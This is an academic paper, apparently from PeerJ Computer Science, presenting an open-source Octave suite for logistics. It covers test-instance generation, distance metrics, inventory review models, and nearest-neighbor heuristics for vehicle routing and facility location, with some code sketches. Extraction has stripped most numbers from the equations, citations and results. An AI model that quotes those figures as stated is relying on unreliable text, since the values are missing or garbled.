in this context, the present work describes the development of an open-source coded suite for the academic researcher and professional in logistics and supply chain management, with the purpose of supporting the modeling and programing skills required to implement and test more advanced methods as those reported in the scientific literature caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and/or shared in undergraduate/postgraduate courses. in particular, the following aspects are addressed: � generation of test instances for routing and facility location problems with real geographical coordinates; � computation of euclidean, manhattan and geographical arc length distance metrics for solving routing and facility location problems (symmetric and asymmetric metrics are considered); � importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; � simulation of non-deterministic inventory control models for assessment of supply strategies; � designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for vehicle routing and facility location problems. as complementary material, a case study is solved with the integration of the functions of the coded suite. implementation of the coded suite was performed through the open source programing software gnu octave (eaton et al., ). the advantage of this software is that it runs on gnu/linux, macos, bsd, and windows, and it is compatible with many matlab scripts. also, its language syntax makes it easily adaptable to other languages such as c++. development of test instances the development of location data is important to test solving methods or algorithms for facility location and vehicle routing problems. to generate location data associated to real geographical coordinates the first step is to understand the coordinate system of the real world. figure presents the ranges for longitude and latitude coordinates (λ and ϕ respectively) of the world map. with these ranges the second step consists on generating location data within specific regions. in example, consider the region delimited by λ ∈ [− , − ] and ϕ ∈ [ , ]. a set of locations within this region can be generated through two approaches: � first, by adapting an already existing set of locations (standard test instance). there are available different sets of test instances for research within the distribution field. however, many of them are not adjusted to geographic coordinates. this can affect the process to estimate distance metrics in kilometers. figure presents the visualization of coordinates from the instance d of the database tsplib (reinelt, ). as presented, the range of the x and y axes are different from those presented in fig. . these non-geographical coordinates can be converted by using the following equation: v ¼ maxnew � minnew maxold � minold � � � ðv � maxoldÞ þ maxnew; ( ) where v is the value within the old range and v′ is the converted value within the new range. eq. ( ) is computed by the function rescaling of the coded suite. as presented in fig. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the location data from the instance d is correctly converted into geographic coordinates. � second, by using a probability distribution. 
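both generation approaches can be sketched in a few lines of octave; the target window, distribution parameters, and demand range below are illustrative, and the suite's rescaling and generatedata functions remain the reference implementations (unifrnd/normrnd require octave's statistics package):

% (1) Re-scale existing (non-geographic) instance coordinates into a target window, Eq. (1).
xy = 1000 * rand(50, 2);                          % stand-in for coordinates read from a TSPLIB-style file
lonRange = [-102, -96];  latRange = [16, 21];     % illustrative target window in degrees
lin = @(v, oldMin, oldMax, newMin, newMax) ...
      ((newMax - newMin) / (oldMax - oldMin)) .* (v - oldMax) + newMax;
lon = lin(xy(:,1), min(xy(:,1)), max(xy(:,1)), lonRange(1), lonRange(2));
lat = lin(xy(:,2), min(xy(:,2)), max(xy(:,2)), latRange(1), latRange(2));

% (2) Generate n random locations directly from uniform or normal distributions.
n    = 100;
lonU = unifrnd(lonRange(1), lonRange(2), n, 1);   % uniform over the window
latU = unifrnd(latRange(1), latRange(2), n, 1);
lonN = normrnd(mean(lonRange), 0.5, n, 1);        % normal around the window centre, sd = 0.5 degrees
latN = normrnd(mean(latRange), 0.5, n, 1);

% Random demand per location; the first location is the depot, so its demand is zero.
demand = [0; randi([5, 30], n - 1, 1)];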
in this case, random coordinates can be generated by using distributions such as the uniform distribution with parameters a and b which represent the minimum and maximum values for the generation range, or the normal distribution where a and b represent the mean and standard deviation values within the generation range. figure presents n = geographic coordinates considering these distributions. this data was generated by the function generatedata of the coded suite. in addition to location data, information regarding demands of locations and capacities of vehicles and warehouses must be generated for routing and coverage problems. by assuming a homogeneous fleet/set of warehouses a unique value is assigned to each of these elements. however, this does not necessarily apply to the demands of the locations to be served. some instances have considered homogeneous demand (same value for all locations). however, in practice, this is not considered. the function rescaling includes additional code to generate random demand for each location. note that, within the demand context, the first location is considered to be the central depot or warehouse, thus, demand is equal to zero. a note on the current approach to generate geographic data while test location data is generated by mathematical methods such as in diaz-parra et al. ( ), in recent years, obtaining geographic location data, also known as geo-location data, has been facilitated by the use of smart phones with integrated global positioning system (gps) receivers. in the market there are diverse software development kits (sdks) and application programming interfaces (apis) to process this data for mapping, route planning and emergency tracking purposes. among these, the google maps© and arcgis© systems can be mentioned (google llc, ; environmental systems research institute, ). as geo-location data is mainly obtained from smart phones and other mobile devices used by people and organizations, using and sharing this data by developers of geographic information system (gis) applications has been the subject of debate and discussion. this is due to concerns regarding the privacy and confidentiality of this data (richardson, ; blatt, ). although security technology and government regulations are frequently developed and established to ensure the ethical use of geo- location data, publicly available databases are the main resource for academic and research purposes. recently, more benchmark instances are generated for vehicle routing problems (uchoa et al., ) which can be adapted to geographic data with the coded suite. nevertheless, within the context of industry . , the computational proficiency on gis applications may become an important requirement and advantage for future logistic professionals and/or academics. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distance metrics within distribution problems, a metric to determine the suitability of a route over other routes is required. the most common criteria to optimize distribution problems is to minimize the metric of distance which is positively associated to transportation costs. there is a wide set of distance metrics, being the euclidean distance the most commonly figure world map displaying the range for longitude (λ) and latitude (φ) coordinates in degrees. full-size doi: . /peerj-cs. 
/fig- rescaling function figure coded suite: re-scaling and plotting of existing location data with the function rescaling. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used. other metrics, such as manhattan distance or arc length are more closely associated to real-world contexts (reinelt, ). figure presents the widely known mathematical formulations to compute these distance metrics. within the coded suite, these metrics are computed by the function distmetrics. it is important to remember that the distance is computed between two points i and j, thus, the x and y coordinates, or longitude (λ) and latitude (ϕ) coordinates, must be known in advance. an important resource for any distribution problem is known as the distance matrix a which stores all distances between each location i and j within the distribution network. thus, this matrix, of dimension n × n (where n is the number of locations, including the central depot) stores each dij data where i, j = ,…, n and dii = djj = (the distance between each point and itself is zero). the function distmetrics also computes the symmetric distance matrix (dij = dji) for each type of metric. uniform distribu�on a b c d e figure coded suite: generation of n geographic coordinates and plotting with the function generatedata. (a) data generated with uniform distribution (a = − and b = − for longitude, a = and b = for latitude). (b–e) data generated with normal distribution with mean values a = − and a = for longitude and latitude respectively. variability of standard deviation is represented by b = z and b = z for longitude and latitude respectively, where z varies from ± . to ± . and represents the number of standard deviations for dispersion. full-size doi: . /peerj-cs. /fig- a b c figure mathematical formulations to compute (a) euclidean, (b) manhattan, and (c) arc length distances between two location points. full-size doi: . /peerj-cs. /fig- caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by considering the converted coordinates into longitude and latitude degrees, the euclidean and manhattan distances provide similar values. in this regard, these values do not represent kilometers. in order to obtain a distance in kilometers, the arc length metric is considered. this metric considers the spherical model of the earth’s surface which has a radius of , km. for this, the coordinates in latitude and longitude degrees are converted into radians by a factor of π/ °. this leads to a symmetrical distance matrix in kilometers. it is important to note that an approximation of the manhattan distance can be estimated in terms of the arc length or euclidean distance by considering trigonometry and right triangles theory. by knowing the angle θ between the hypotenuse and one of the catheti, and the length or magnitude of the hypotenuse (i.e., euclidean or arc length dij), the length of both catheti can be estimated as: c ¼ dij � sinðuÞ; ( ) c ¼ dij � cosðuÞ: ( ) thus, if the euclidean or arc length metric is available, then the manhattan distance can be estimated as c + c . different estimates can be obtained based on the assumed value for θ. 
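a compact octave version of the three metrics and of the symmetric distance matrices they produce, in the spirit of distmetrics; the arc length uses the spherical-earth model with the commonly used mean radius of about 6,371 km, and the angle θ of the manhattan approximation is an assumed value:

% lon, lat: coordinates in degrees (illustrative values).
lon = [-100.2; -99.1; -98.6; -97.4];
lat = [  19.4;  20.1;  18.9;  19.8];
n   = numel(lon);
R   = 6371;                          % mean Earth radius in km (spherical model)
d2r = pi / 180;                      % degrees -> radians

Deuc = zeros(n); Dman = zeros(n); Darc = zeros(n);
for i = 1:n
  for j = 1:n
    dx = lon(i) - lon(j);  dy = lat(i) - lat(j);
    Deuc(i,j) = sqrt(dx^2 + dy^2);                 % Euclidean distance (in degrees)
    Dman(i,j) = abs(dx) + abs(dy);                 % Manhattan distance (in degrees)
    if i ~= j                                      % arc length on the sphere (in km)
      Darc(i,j) = R * acos(sin(lat(i)*d2r) * sin(lat(j)*d2r) + ...
                           cos(lat(i)*d2r) * cos(lat(j)*d2r) * cos((lon(i) - lon(j))*d2r));
    end
  end
end

% Manhattan estimate from the arc-length hypotenuse and an assumed angle theta.
theta   = 40 * d2r;
DmanEst = Darc .* (sin(theta) + cos(theta));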
finally, an asymmetric distance matrix (dij ≠ dji) can be computed by adjusting the function distmetrics to represent dji = dij + unifrnd( , mean(dij)). note that this operation modifies dji by adding to dij a random uniform value within the range from to the mean value of all distances within a (although a different random value can be added). a note on distance metrics the type of distance or cost metric is one of the main aspects of distribution problems because it is correlated to the accuracy of their solution. diverse sdks and apis are currently used to estimate the asymmetric/symmetric distances and/or times between locations considering the actual urban layout and traffic conditions. tools such as google maps© and waze© perform these tasks in real-time on computers and mobile devices. nevertheless, construction of a distance matrix may require a large number of gis queries (n × n − n) which are frequently restricted by the license terms of the sdk/api. also, there are concerns regarding the privacy and confidentiality of this data as routing patterns are sensitive information. thus, mathematical formulations are considered to estimate these metrics in a more direct way for the development of methods to solve distribution problems. among other distance metrics the following can be mentioned: � ellipsoidal distance, which is the geodesic distance on the ellipsoidal earth (mysen, ). it is based on the assumption that the ellipsoid is more representative of the earth’s true shape which is defined as geoid. while the spherical model assumes symmetry at each quadrant of the earth, the ellipsoidal model assumes the associated asymmetry and the implications for route and facility location planning (cazabal-valencia, caballero-morales & martinez-flores, ). caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � geodesic distance on riemannian surfaces, which in general terms can estimate different curvatures and disturbances on the earth’s surface for route and facility location planning (tokgöz & trafalis, ). inventory control inventory management is an important aspect of distribution as proper inventory levels are required to ensure the constant supply of goods. this however must comply with restrictions to avoid unnecessary costs associated to inventory supply processes. in this regard, the term economic order quantity (eoq) has been used to define the optimal lot size q which is required to minimize inventory management costs such as those associated to ordering and holding goods through the supply chain. determination of q may become a complex task due to the different variables involved in the inventory supply processes such as costs, delivery times, planning horizon, cycle time, stock-out costs and probabilities, service levels, demand patterns (thinakaran, jayaprakas & elanchezhian, ). thus, different mathematical models have been developed to determine the eoq considering these multiple variables (thinakaran, jayaprakas & elanchezhian, ; braglia et al., ; de & sana, ; hovelaque & bironneau, ). in this context, depending of the variability of the demand patterns (as measured by a coefficient of variability cv = σ/μ, where σ and μ are the standard deviation and mean of the demand data respectively) there are inventory control models for deterministic and non-deterministic demand. if demand follows an almost constant pattern with small variability (cv < . 
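the supply pattern just described can be simulated in a few lines of octave, in the spirit of the continuousreview function; the demand statistics, lead time, planning horizon, and the given values of q and r below are illustrative (the suite computes q and r with the iterative algorithm shown in its figure):

% Illustrative parameters: a given (Q, r) policy applied to random test demand.
d = 100;  sigma = 30;          % mean and standard deviation of daily demand
LT = 5;                        % lead time in days
Q  = 1200;  r = 650;           % lot size and reorder point (assumed already computed)
horizon = 120;                 % planning horizon in days
w = 2;                         % demand variability: dtest in [d - w*sigma, d + w*sigma]

inv = r + Q;                   % starting inventory level, as in the supply pattern above
pending = [];                  % arrival day of the outstanding order (if any)
level = zeros(horizon, 1);
for t = 1:horizon
  if ~isempty(pending) && pending(1) == t       % an ordered lot arrives after its lead time
    inv = inv + Q;  pending(1) = [];
  end
  dtest = max(0, d + (2*rand - 1) * w * sigma); % random test demand for day t
  inv = inv - dtest;                            % a negative level indicates a stock-out
  if inv <= r && isempty(pending)               % continuous review: reorder when r is reached
    pending(end + 1) = t + LT;
  end
  level(t) = inv;
end
plot(1:horizon, level, 'b-', [1 horizon], [r r], 'r--');
xlabel('day'); ylabel('inventory level'); legend('inventory', 'reorder point r');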
if demand follows an almost constant pattern with small variability (i.e., a cv below a small threshold), it is assumed to be deterministic; otherwise, it is non-deterministic. in practice, demand is frequently non-deterministic, and two of the most useful inventory control models for this case are the continuous and periodic review models. these models, also known as the (q, r) model (hariga, ; adamu, ) and the p model (lieberman & hillier, ), respectively, are analyzed in the following sections.

continuous review model
the (q, r) model considers the costs and variables described in the table below. with these parameters and variables, lots of size q are ordered through a planning horizon to serve a cumulative demand. the corresponding figure presents an overview of the supply patterns considered by this model and its mathematical formulation to determine q, r, and the associated total inventory costs. at the beginning of the planning horizon, the inventory level starts at r + q. it is decreased by the daily or weekly demand estimated as d; if historical demand data is available, it can be used to provide a better estimate for d. as soon as the inventory level reaches r, the inventory manager must request an order of size q because there is only enough stock to supply lt days or weeks. hence, the inventory must be continuously reviewed to accurately detect the re-order point r and reduce the stock-out risk during the lead time lt.
because uncertain demand is assumed, the inventory consumption rate is different throughout the planning horizon. hence, r can be reached at different times, which leads to inventory cycles t of different length. for this model, the function continuousreview computes the lot size q, the reorder point r, and the total inventory cost. this function also generates random demand test data (dtest) to plot the inventory supply patterns obtained with the computed parameters q and r. dtest is generated through the expression $d_{test} = d + w\sigma$, where w is the number of standard deviations and is randomly generated within a specific range.

table: parameters and variables of the (q, r) inventory control model.
- c: purchase cost per unit of product.
- co: order cost per lot q.
- ch: holding cost per unit of product in inventory.
- p: stock-out cost per unit of product.
- r: reorder point (level of inventory at which a lot of size q must be ordered to avoid stock-out).
- d: average daily demand of products, or average demand on the smallest unit of time.
- σ: standard deviation of the average daily demand (estimated on the same unit of time as d).
- μlt: average demand through the lead time (lt); it can be estimated as d × lt if both are on the same unit of time.
- σlt: standard deviation of demand through the lt; it can be estimated as σ × √lt if both are on the same unit of time.
- d (cumulative): cumulative demand through the planning horizon; if d is a weekly demand, then the cumulative demand is k × d, where k is the number of weeks within the planning horizon.
- l(z): loss function associated with r.

[figure: continuous review (q, r) model. (a) inventory supply pattern. (b) iterative algorithm to estimate q and r. (c) mathematical formulation of the total inventory costs.]
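the following python sketch illustrates one common textbook iteration for estimating a (q, r) policy under normally distributed lead-time demand, in the spirit of the iterative algorithm referenced in the figure above; it is not the paper's continuousreview function, and the stopping tolerance, the loss-function form, and the use of scipy are assumptions of this example.

```python
import math
from scipy.stats import norm

def continuous_review_qr(D, d, sigma, LT, Co, Ch, p, tol=1e-6, max_iter=100):
    """Textbook iterative estimate of the (Q, r) policy.
    D: cumulative demand over the horizon, d/sigma: per-period demand mean/std,
    LT: lead time in periods, Co: order cost, Ch: holding cost, p: stock-out cost."""
    mu_lt = d * LT
    sigma_lt = sigma * math.sqrt(LT)
    loss = lambda z: norm.pdf(z) - z * (1.0 - norm.cdf(z))  # standard normal loss L(z)

    Q = math.sqrt(2.0 * D * Co / Ch)   # EOQ as the starting lot size
    z = 0.0
    for _ in range(max_iter):
        # stock-out probability per cycle implied by the current Q
        prob_stockout = min(Q * Ch / (p * D), 0.999)
        z_new = norm.ppf(1.0 - prob_stockout)
        Q_new = math.sqrt(2.0 * D * (Co + p * sigma_lt * loss(z_new)) / Ch)
        if abs(Q_new - Q) < tol and abs(z_new - z) < tol:
            Q, z = Q_new, z_new
            break
        Q, z = Q_new, z_new
    r = mu_lt + z * sigma_lt            # reorder point = mean lead-time demand + safety stock
    return Q, r, z
```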
note that q and r are estimated from historical data (d, σ) and a specific z as computed by the iterative algorithm described in the corresponding figure. thus, if test data is generated with a higher variability (i.e., with w > z), the model provides a useful simulation to determine the break point of the strategy defined by q and r. the corresponding figure presents examples considering three increasingly wide ranges of w for a case with given d and σ. by considering demand within the limits defined by the standard normal distribution, the model is able to avoid stock-out events. however, if much higher variability is considered (by far higher than the input data used for the estimation of q and r), the parameters of the model are not able to avoid stock-out events. also note that, as variability increases, the consumption rate is faster and thus more orders must be requested: for the narrowest range of w five orders were needed, while for the two wider ranges six orders were needed. this corroborates the validity of this method for inventory control under uncertain demand and for the assessment of scenarios with higher variability.
[figure: coded suite: performance of the continuous review (q, r) strategy with different variability conditions as computed by the function continuousreview. (a–c) test demand data generated with increasingly wide ranges of w standard deviations.]

periodic review model
the p model considers the costs and variables described in the table below. the corresponding figure presents an overview of the supply patterns considered by this model and its mathematical formulation to determine q and the associated total inventory costs. in contrast to the (q, r) model, in the p model the inventory review is performed at fixed intervals of length t, and q is estimated considering the available inventory i at that moment. thus, different lots of size q are ordered depending on the available inventory at the end of each review period t. for this model, the function periodicreview computes the lot size q and the total inventory cost.

table: main parameters and variables of the (q, r) and p models.
- co: order cost per lot q.
- ch: holding cost per unit of product in inventory.
- t: time between inventory reviews, with t > lt.
- d: average daily demand of products, or average demand on the smallest unit of time.
- d (cumulative): cumulative demand through the planning horizon; if d is a weekly demand, then the cumulative demand is k × d, where k is the number of weeks within the planning horizon.
- σ: standard deviation of the average daily demand (estimated on the same unit of time as d).
- z: number of standard deviations associated with a service level.

[figure: periodic review (p) model. (a) inventory supply pattern. (b) mathematical formulation to estimate q at each period. (c) mathematical formulation of the total inventory costs.]
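as a sketch of the order-quantity computation just described, the following python snippet uses the standard "order-up-to" formulation for the periodic review model (cover the mean demand over t + lt plus safety stock, minus the available inventory); the paper's exact formulation is given in its figure, and the default service level and the parameter values in the usage comment are assumptions of this example.

```python
from scipy.stats import norm

def periodic_review_order(d, sigma, T, LT, on_hand, service_level=0.975):
    """Order quantity at a review under the P model: target level minus on-hand
    inventory, where the target covers demand over T + LT plus safety stock."""
    z = norm.ppf(service_level)                       # standard-normal quantile for the service level
    target = d * (T + LT) + z * sigma * ((T + LT) ** 0.5)
    return max(0.0, target - on_hand)

# usage sketch: review every 14 days with a 1-day lead time (assumed values)
# q = periodic_review_order(d=3.2, sigma=1.1, T=14, LT=1, on_hand=20)
```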
this function also generates random demand test data (dtest) to plot the inventory supply patterns obtained with the computed parameter q. as in the case of the (q, r) model, the corresponding figure presents examples considering three increasingly wide ranges of w for the variable demand rate. here, the advantages of the (q, r) model are evident for demand with high variability. at the moment of review (at the end of t), the lot size q − i is estimated based on the historical data modeled through d and σ. this lot size must be able to cover the demand for the next period t + lt. however, this increases the stock-out risk because ordering is restricted to the end of t. thus, if during that period the demand increases significantly (more than that modeled by σ), inventory can be consumed at a higher rate. for the considered example, the required service level was set to . %; by assuming normality, the z-value associated with this probability is approximately . . thus, for demand within the narrowest range of w standard deviations, the q estimated by the p model is marginally able to keep the supply without stock-out. as presented in the corresponding figure, with higher variability there are more stock-out events. thus, it is recommended to re-estimate the q parameter considering the updated demand patterns during the previous t + lt (i.e., to update d and σ). these observations are important when evaluating inventory supply strategies.
[figure: coded suite: performance of the periodic (p) strategy with different variability conditions as computed by the function periodicreview. (a–c) test demand data generated with increasingly wide ranges of w standard deviations.]

a note on inventory control models
the analysis of the (q, r) and p models provides the basics to understand most advanced models, as they introduce the following key features: uncertain demand modeled by a probability distribution function (i.e., the normal distribution), quantification of stock-out risks, fixed and variable review periods/inventory cycle times, cost equations as metrics to determine and evaluate the optimal lot policy, and the use of iterative algorithms to determine the optimal parameters q and r. extensions of these models are continuously proposed to address specific inventory planning conditions such as perishable products (muriana, ; braglia et al., ), new products (sanchez-vega et al., ), seasonal demand (lee, ), quantity discounts (darwish, ; lee & behnezhad, ), disruptions (sevgen, ), and reduction of co2 emissions (caballero-morales & martinez-flores, ). these works explicitly state the need for a proper background on mathematical modeling (i.e., equations and heuristic algorithms) and computer programming, which supports the present work.

solving methods for routing and facility location problems
standard approaches of operations research (or) such as mixed integer linear programming (milp) or dynamic programming (dp) are often of limited use for large problems due to excessive computation time (zäpfel, braune & bögl, ). thus, meta-heuristics have been developed to provide near-optimal solutions in reasonable time for large production and logistic problems.
as an introductory meta-heuristic, this work considers two integrated local search algorithms based on the fundamentals of the greedy randomized adaptive search procedure (grasp) and nearest-neighbor search (nns). a complete review of more complex meta-heuristics and solving methods for different vehicle routing/facility location problems can be found in basu, sharma & ghosh ( ), prodhon & prins ( ) and bräysy & gendreau ( a, b). for the development of the integrated local search algorithms it is important to identify the characteristics of the vehicle routing/facility location problems and their solutions. this is discussed in the following sections.

vehicle routing problem
in this problem, a vehicle or set of vehicles departs from a single location where a depot or distribution center is established. these vehicles serve a set of locations associated with customers/suppliers to deliver/collect items. if each vehicle has finite capacity, then the vehicle's route can only visit those customer/supplier locations whose requirements do not exceed its capacity. this leads to defining multiple routes that serve disjoint sets of customer/supplier locations, where each location can only be visited once. optimization is focused on determining the required routes and the visiting sequence to minimize traveling distance and/or costs. the corresponding figure presents an overview of the capacitated vrp (also known as the cvrp).
[figure: characteristics of the capacitated vehicle routing problem (cvrp): customer demands di, a central depot, capacity constraints per vehicle/route, and an example solution.]
for this work, two main tasks are considered to provide a solution: partitioning and sequencing of minimum distance. partitioning can be applied over a single total route to obtain sub-routes served by vehicles of finite capacity. sequencing can then be applied over a set of customer locations to determine the most suitable visiting order to reduce traveling time/distance; this can be applied on the single total route and on each sub-route. the coded suite includes the function nnscvrp, which implements a nearest-neighbor search (nns) approach for the sequencing and partitioning tasks. this is performed as follows (an illustrative sketch of these steps is given below):
- first, sequencing through the nearest or closest candidate nodes within a distance "threshold" is performed. this "threshold" is computed by considering the minimum distances plus the weighted standard deviation of the distances between all nodes or locations.
- second, the total partial route obtained by the nns sequencing is partitioned into capacity-restricted sub-routes by the sub-function partitioning.
- third, the sub-function randomimprovement is executed on the total partial route obtained by the nns sequencing, and on each sub-route generated by the sub-function partitioning. it performs exchange and flip operators on random sub-sequences and points within each route/sub-route following a grasp scheme.
finally, the function nnscvrp plots the locations, the total route, and the cvrp sub-routes for assessment purposes. the corresponding figure presents the results obtained for the instance x-n -k .vrp with euclidean distance.
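the following simplified python sketch mirrors the three construction/improvement steps listed above (nns sequencing, capacity partitioning, and grasp-style random exchange/flip improvement); it is an illustration only, not the suite's nnscvrp function, and the simple consecutive partitioning rule and the iteration budget are assumptions of this example.

```python
import random

def route_length(route, dist):
    """Total length of a route that starts and ends at the depot (index 0)."""
    tour = [0] + route + [0]
    return sum(dist[tour[k]][tour[k + 1]] for k in range(len(tour) - 1))

def nearest_neighbor_sequence(dist):
    """Greedy NNS sequencing of all customers (nodes 1..n-1) from the depot."""
    n = len(dist)
    unvisited, current, seq = set(range(1, n)), 0, []
    while unvisited:
        nxt = min(unvisited, key=lambda j: dist[current][j])
        seq.append(nxt)
        unvisited.remove(nxt)
        current = nxt
    return seq

def partition_by_capacity(seq, demand, capacity):
    """Split the single total route into consecutive capacity-feasible sub-routes."""
    sub_routes, load, current = [], 0.0, []
    for j in seq:
        if load + demand[j] > capacity and current:
            sub_routes.append(current)
            current, load = [], 0.0
        current.append(j)
        load += demand[j]
    if current:
        sub_routes.append(current)
    return sub_routes

def random_improvement(route, dist, iterations=2000, rng=random):
    """GRASP-style improvement: random exchange (swap) and flip (segment reversal)
    moves, keeping a move only when it shortens the route."""
    if len(route) < 2:
        return route[:], route_length(route, dist)
    best, best_len = route[:], route_length(route, dist)
    for _ in range(iterations):
        cand = best[:]
        i, j = sorted(rng.sample(range(len(cand)), 2))
        if rng.random() < 0.5:
            cand[i], cand[j] = cand[j], cand[i]       # exchange operator
        else:
            cand[i:j + 1] = reversed(cand[i:j + 1])   # flip operator
        cand_len = route_length(cand, dist)
        if cand_len < best_len:
            best, best_len = cand, cand_len
    return best, best_len

def nns_cvrp(dist, demand, capacity):
    """Construct and improve a CVRP solution: sequence, partition, then improve."""
    seq, _ = random_improvement(nearest_neighbor_sequence(dist), dist)
    sub_routes = partition_by_capacity(seq, demand, capacity)
    improved = [random_improvement(r, dist)[0] for r in sub_routes]
    total = sum(route_length(r, dist) for r in improved)
    return improved, total
```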
the instance consists of nodes (i.e., customer/demand locations and one central depot location) and a homogeneous fleet with capacity of . as observed, the function nnscvrp defined sub-routes, which is the optimal number as stated in the file name of the instance. an important aspect of any solving method, particularly of meta-heuristics, is the assessment of its accuracy. the most frequently used metric for assessment is the % error gap, which is computed as

$\%E = \dfrac{A - B}{B} \times 100,$

where a is the result obtained with the considered solving method and b is the best-known solution. for the present example, the best-known solution is , . while the described nns algorithm achieved a solution of a = , . ; hence, the error gap is estimated as . %, which is very close to the best-known solution. also, this result was obtained within reasonable time ( . s).

a note on solving methods for the cvrp
the cvrp is one of the most challenging problems within the logistics field due to its np-hard complexity and its relevance to distribution performance. thus, there are two main research contexts for the cvrp:
- problem modeling: within this context the following extensions can be mentioned: the cvrp with two-dimensional (2d) and three-dimensional (3d) loading constraints (wei et al., ; tao & wang, ), the cvrp with traffic jams (mandziuk & swiechowski, ), the cvrp with carriers (rojas-cuevas et al., ), the vrp with carbon emissions (liu et al., ), and the cvrp with alternative delivery, pick-up and time windows (sitek et al., ).
- problem solving: frequently, the solving method is proposed together with the model of the problem. due to the complexity of the cvrp itself, most of the solving methods are based on meta-heuristics such as particle swarm optimization (pso) (hannan et al., ), the quantum immune algorithm (qia) (liu et al., ), matheuristics (archetti & speranza, ), tabu-search (ts) (tao & wang, ) and genetic algorithms (ga) (mulloorakam & nidhiry, ), with hybrid methods showing better performance.
to design and test meta-heuristics, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method (i.e., construction and improvement processes) and its implementation through computer programming (i.e., coding in c++, matlab, python). in this aspect, the suite code nnscvrp can provide both resources. more information regarding vrp models and solving methods can be found in toffolo, vidal & wauters ( ), archetti & speranza ( ) and baldacci, mingozzi & roberti ( ).

facility location problem
in this problem, it is required to determine the most suitable location for a facility or set of facilities (multi-facility location problem, mflp) to serve a set of customers/suppliers. as in the cvrp, if capacity is considered for the facilities, multiple facilities are required to serve unique sets of customer/supplier locations, where each location can only be served by a unique facility. if facilities are located at the location of minimum distance to all customers/suppliers, the mflp is known as the capacitated weber problem (aras, yumusak & altmel, ). however, if facilities are located at the average locations between all customers/suppliers (i.e., at the centroids), the mflp is known as the capacitated centered clustering problem (cccp) (negreiros & palhano, ).
finally, if facilities are located at already defined median locations, the mflp is known as the capacitated p-median problem (cpmp) (stefanello, cb-de-araújo & müller, ). the corresponding figure presents an overview of these variations of the mflp. it is important to observe that the characteristics of the locations have a direct effect on the solution.
[figure: coded suite: solution of the nns-grasp meta-heuristic for the cvrp instance x-n -k .vrp as computed by the function nnscvrp, showing the total single route and the cvrp sub-routes obtained by partitioning + random improvement (exchange/flip operators).]
facility location problems are frequently solved through clustering or classification methods. within the coded suite, the function nnscccp performs a nearest-neighbor search (nns) algorithm with an appropriate capacity-restricted assignment algorithm to provide a very suitable solution. this is performed as follows (a simplified illustrative sketch is given at the end of this discussion):
- first, it generates a feasible initial solution through the sub-function random_assignment. randomness is considered when two or more nodes are located at the same distance from a centroid, and in the initial location of the centroids. this adds flexibility to the assignment task and to the search mechanism of the nns algorithm.
- second, the initial solution is improved through the sub-function update_centroids_assignment.
- third, if the solution generated by update_centroids_assignment complies with all restrictions and its objective function value is better than a reference value, it is stored as the best found solution.
when solving combinatorial problems, it is always recommended to verify the correctness of the solution and to know the convergence patterns of the solving algorithm. both aspects provide insights regarding hidden mistakes in the computer code and deficiencies in the search mechanisms of the solving algorithm (e.g., fast or slow convergence to local optima). to address this issue, at each iteration of the nns algorithm, the function nnscccp executes a verification and a backup routine for the best solution's value. the purpose of the backup routine is to provide data for convergence analysis. the corresponding figure presents the verified results of the function nnscccp for the cccp instance sjc .dat considering euclidean distance. the instance consists of nodes (i.e., customer/demand locations), centroids (i.e., facilities to be located) and a homogeneous capacity of . finally, the accuracy of this solution is assessed through the % error gap equation. the nns solution leads to a total distance value of a = , . while the best-known solution leads to b = , . ; the error gap is then estimated as . %, which is within the limit of . % for the cccp. the consideration of randomness within the search mechanism of the nns algorithm is common to most meta-heuristic solving methods. convergence depends on this aspect; thus, assessment of meta-heuristics is performed considering different cccp instances and multiple executions. if the coefficient of variability of the results through multiple executions is within . , it can be assumed that the meta-heuristic is stable. the corresponding figure presents an example of this extended assessment scheme considering instances from the well-known sjc and doni databases.
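the following python sketch illustrates the kind of capacity-restricted clustering heuristic described above (random initial centroids, greedy capacity-feasible assignment, centroid update, and retention of the best solution); it is an illustration only, not the suite's nnscccp function, and the iteration budget and the single re-assignment step are assumptions of this example.

```python
import random
import math

def total_assignment_distance(points, centroids, assign):
    return sum(math.dist(points[i], centroids[assign[i]]) for i in range(len(points)))

def capacitated_assignment(points, demand, centroids, capacity, rng):
    """Greedily assign each node to its nearest centroid with remaining capacity.
    Nodes are visited in random order to diversify the construction (GRASP-like)."""
    load = [0.0] * len(centroids)
    assign = [None] * len(points)
    order = list(range(len(points)))
    rng.shuffle(order)
    for i in order:
        feasible = [c for c in range(len(centroids)) if load[c] + demand[i] <= capacity]
        if not feasible:
            return None                       # infeasible construction, caller retries
        c = min(feasible, key=lambda c: math.dist(points[i], centroids[c]))
        assign[i] = c
        load[c] += demand[i]
    return assign

def nns_cccp(points, demand, p, capacity, iterations=200, seed=0):
    """Sketch of a capacitated centered clustering heuristic: random initial
    centroids, capacity-restricted assignment, centroid update, keep the best."""
    rng = random.Random(seed)
    best_assign, best_cent, best_cost = None, None, float("inf")
    for _ in range(iterations):
        centroids = [list(points[i]) for i in rng.sample(range(len(points)), p)]
        assign = capacitated_assignment(points, demand, centroids, capacity, rng)
        if assign is None:
            continue
        # update centroids to the mean of their assigned nodes, then re-assign once
        for c in range(p):
            members = [points[i] for i in range(len(points)) if assign[i] == c]
            if members:
                centroids[c] = [sum(v) / len(members) for v in zip(*members)]
        assign = capacitated_assignment(points, demand, centroids, capacity, rng) or assign
        cost = total_assignment_distance(points, centroids, assign)
        if cost < best_cost:                  # keep the best verified solution
            best_assign, best_cent, best_cost = assign, centroids, cost
    return best_assign, best_cent, best_cost
```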
